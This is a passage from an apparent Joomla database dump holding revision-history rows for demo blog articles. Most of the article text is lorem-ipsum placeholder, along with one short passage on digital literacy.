\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":2,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"5\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(61,78,1,'','2016-02-28 09:46:58',692,2999,'cef7f8334061afa0202675ed73bf20614ef885c1','{\"id\":78,\"asset_id\":\"233\",\"title\":\"Welcome to the future.\",\"alias\":\"welcome-to-the-future\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 09:46:58\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 09:46:43\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"images\\\\\\/images-05.jpg\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/images-05.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":4,\"ordering\":\"1\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"4\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(62,78,1,'','2016-02-28 11:07:40',692,3067,'8a780110dfbe55be56cea0c1f705b8c48f982fea','{\"id\":78,\"asset_id\":\"233\",\"title\":\"Welcome to the future.\",\"alias\":\"welcome-to-the-future\",\"introtext\":\"<p><img class=\\\"pull-left\\\" src=\\\"images\\/images-05.jpg\\\" alt=\\\"\\\" \\/> Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 11:07:40\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 11:06:58\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"images\\\\\\/images-05.jpg\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/images-05.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":5,\"ordering\":\"1\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"4\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(63,78,1,'','2016-02-28 11:09:10',692,3044,'57549115df89ba6f8e3d2405f12d8e524ee4b689','{\"id\":78,\"asset_id\":\"233\",\"title\":\"Welcome to the future.\",\"alias\":\"welcome-to-the-future\",\"introtext\":\"<p><img class=\\\"pull-left\\\" src=\\\"images\\/images-05.jpg\\\" alt=\\\"\\\" \\/> Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 11:09:10\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 11:09:05\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/images-05.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":6,\"ordering\":\"1\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"4\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(64,77,1,'','2016-02-28 11:10:31',692,3973,'1cfab6de2b42bd12293fcc12b8735e5640160677','{\"id\":77,\"asset_id\":\"201\",\"title\":\"Why we all need to be connected.\",\"alias\":\"why-we-all-need-to-be-connected\",\"introtext\":\"<p><img class=\\\"pull-left\\\" src=\\\"images\\/images-01.jpg\\\" alt=\\\"\\\" \\/> We\\u2019re in a period where the cutting edge of change has moved from the technology to the literacies made possible by the technology.<\\/p>\\r\\n<p>The future of digital culture \\u2013 yours, mine, and ours \\u2013 depends on how well we learn to use the media that have infiltrated, amplified, distracted, enriched, and complicated our lives. I believe that learning to live mindfully in cyber culture is as impor\\u00adtant to us as a civilization as it is vital to you and me as individuals. The mindful use of digital media doesn\\u2019t happen automatically.<\\/p>\\r\\n<p>Thinking about what you are doing and why you are doing it instead of going through the motions is fundamental to the defi\\u00adnition of mindful, whether you are de\\u00adciding to follow someone on Twitter, shutting the lid of your laptop in class, looking up from your BlackBerry in a meeting, or consciously deciding which links not to click. Although edu\\u00adcational institutions have been slow to incorporate digital literacies, practi\\u00adcal know-how is available to those who figure out how to find it. This know-how, from the art of growing social capital in virtual communities to the craft of cultivating wiki collaboration, might determine whether life online will drive us to distraction, or augment and broaden our minds.<\\/p>\\r\\n<p>Those who un\\u00adderstand the fundamentals of digital participation, online collaboration, in\\u00adformational credibility testing, and network awareness will be able to exert more control over their own fates than those who lack this lore.<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 11:10:31\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 11:09:28\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/images-01.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"Pork meatball ground round prosciutto. Sirloin bresaola ball tip shank tail porchetta pork boudin filet mignon flank jowl salami. Filet mignon bresaola pork boudin capicola prosciutto. Frankfurter chicken leberkas drumstick ball tip turducken rump spare ribs meatball. Tail salami pork loin ham. Drumstick flank porchetta, hamburger ham swine biltong chicken pancetta. Spare ribs prosciutto t-bone.\\\",\\\"quote_author\\\":\\\"- John Doe\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":5,\"ordering\":\"2\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"31\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(65,76,1,'','2016-02-28 11:11:10',692,4222,'b9559399f91d86cc993a20cdb4adf11d98bd8f95','{\"id\":76,\"asset_id\":\"200\",\"title\":\"Who Actually Clicks on Banner Ads?\",\"alias\":\"who-actually-clicks-on-banner-ads\",\"introtext\":\"<p><img class=\\\"pull-left\\\" src=\\\"images\\/images-04.jpg\\\" alt=\\\"\\\" \\/> Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 11:11:10\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 11:10:56\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/images-04.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"Responive Joomla Templates\\\",\\\"link_url\\\":\\\"http:\\\\\\/\\\\\\/www.joomshaper.com\\\\\\/joomla-templates\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":7,\"ordering\":\"3\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"39\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(66,75,1,'','2016-02-28 11:11:37',692,4697,'53e9ce532a2547ab813d88f0ad4246198a5c83de','{\"id\":75,\"asset_id\":\"199\",\"title\":\"5 Effective Email Unsubscribe Pages.\",\"alias\":\"5-effective-email-unsubscribe-pages\",\"introtext\":\"<p><img class=\\\"pull-left\\\" src=\\\"images\\/images-03.jpg\\\" alt=\\\"\\\" \\/> Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 11:11:37\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 11:11:14\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/images-03.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_art